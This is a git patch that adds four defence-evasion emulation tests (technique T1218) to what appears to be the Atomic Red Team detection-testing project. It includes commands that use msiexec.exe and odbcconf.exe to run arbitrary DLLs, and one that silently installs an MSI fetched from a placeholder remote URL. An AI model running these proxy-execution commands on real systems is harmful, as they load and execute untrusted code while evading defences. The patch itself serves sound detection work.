From e2309b30af0baf8c832e16ff700c92e5fec3aa7f Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 8 Nov 2019 19:57:19 -0600 Subject: [PATCH] T1218 proxied binary execution tests (#628) * Added proxied binary execution tests * Generate docs from job=validate_atomics_generate_docs branch=t1218_tests --- atomics/T1218/T1218.md | 92 ++++++++++++++++++++++++++++++ atomics/T1218/T1218.yaml | 69 ++++++++++++++++++++++ atomics/index.md | 8 +++ atomics/index.yaml | 120 +++++++++++++++++++++++++++++++++++++++ atomics/windows-index.md | 8 +++ 5 files changed, 297 insertions(+) diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 6c51bc99..ea0f4256 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -33,6 +33,14 @@ Several other binaries exist that may be used to perform similar behavior. (Cita - [Atomic Test #3 - Register-CimProvider - Execute evil dll](#atomic-test-3---register-cimprovider---execute-evil-dll) +- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file](#atomic-test-4---msiexecexe---execute-local-msi-file) + +- [Atomic Test #5 - Msiexec.exe - Execute Remote MSI file](#atomic-test-5---msiexecexe---execute-remote-msi-file) + +- [Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-6---msiexecexe---execute-arbitrary-dll) + +- [Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-7---odbcconfexe---execute-arbitrary-dll) +
@@ -97,4 +105,88 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} +
+
+ +## Atomic Test #4 - Msiexec.exe - Execute Local MSI file +Execute arbitrary MSI file. Commonly seen in application installation. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218.msi| + +#### Run it with `command_prompt`! +``` +msiexec.exe /q /i "#{msi_payload}" +``` + + + +
+
+ +## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file +Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| msi_payload | MSI file to execute | String | http://site.com/file.msi| + +#### Run it with `command_prompt`! +``` +msiexec.exe /q /i "#{msi_payload}" +``` + + + +
+
+ +## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL +Execute arbitrary DLL file stored locally. Commonly seen in application installation. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll| + +#### Run it with `command_prompt`! +``` +msiexec.exe /y "#{dll_payload}" +``` + + + +
+
+ +## Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL +Execute arbitrary DLL file stored locally. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll| + +#### Run it with `command_prompt`! +``` +odbcconf.exe /S /A {REGSVR "#{dll_payload}"} +``` + + +
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 3909a4dc..0be10657 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -58,3 +58,72 @@ atomic_tests: name: command_prompt command: | C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} + +- name: Msiexec.exe - Execute Local MSI file + description: | + Execute arbitrary MSI file. Commonly seen in application installation. + + supported_platforms: + - windows + + input_arguments: + msi_payload: + description: MSI file to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + executor: + name: command_prompt + command: | + msiexec.exe /q /i "#{msi_payload}" + +- name: Msiexec.exe - Execute Remote MSI file + description: | + Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. + + supported_platforms: + - windows + + input_arguments: + msi_payload: + description: MSI file to execute + type: String + default: http://site.com/file.msi + executor: + name: command_prompt + command: | + msiexec.exe /q /i "#{msi_payload}" + +- name: Msiexec.exe - Execute Arbitrary DLL + description: | + Execute arbitrary DLL file stored locally. Commonly seen in application installation. + + supported_platforms: + - windows + + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: | + msiexec.exe /y "#{dll_payload}" + +- name: Odbcconf.exe - Execute Arbitrary DLL + description: | + Execute arbitrary DLL file stored locally. + + supported_platforms: + - windows + + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: | + odbcconf.exe /S /A {REGSVR "#{dll_payload}"} + diff --git a/atomics/index.md b/atomics/index.md index 5eb5240d..2be43da7 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -342,6 +342,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -710,6 +714,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - [T1153 Source](./T1153/T1153.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index 8144122a..b6246769 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -10237,6 +10237,66 @@ defense-evasion: name: command_prompt command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload} \n" + - name: Msiexec.exe - Execute Local MSI file + description: 'Execute arbitrary MSI file. Commonly seen in application installation. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Remote MSI file + description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen + in application installation, commonly seen in malware execution. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: String + default: http://site.com/file.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. Commonly seen in application + installation. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: "msiexec.exe /y \"#{dll_payload}\" \n" + - name: Odbcconf.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} + +' T1216: technique: x_mitre_data_sources: @@ -20397,6 +20457,66 @@ execution: name: command_prompt command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload} \n" + - name: Msiexec.exe - Execute Local MSI file + description: 'Execute arbitrary MSI file. Commonly seen in application installation. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Remote MSI file + description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen + in application installation, commonly seen in malware execution. + +' + supported_platforms: + - windows + input_arguments: + msi_payload: + description: MSI file to execute + type: String + default: http://site.com/file.msi + executor: + name: command_prompt + command: "msiexec.exe /q /i \"#{msi_payload}\" \n" + - name: Msiexec.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. Commonly seen in application + installation. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: "msiexec.exe /y \"#{dll_payload}\" \n" + - name: Odbcconf.exe - Execute Arbitrary DLL + description: 'Execute arbitrary DLL file stored locally. + +' + supported_platforms: + - windows + input_arguments: + dll_payload: + description: DLL to execute + type: Path + default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + executor: + name: command_prompt + command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} + +' T1216: technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a956d34f..181ee513 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -132,6 +132,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -572,6 +576,10 @@ - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] + - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows] + - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows] + - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows] + - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)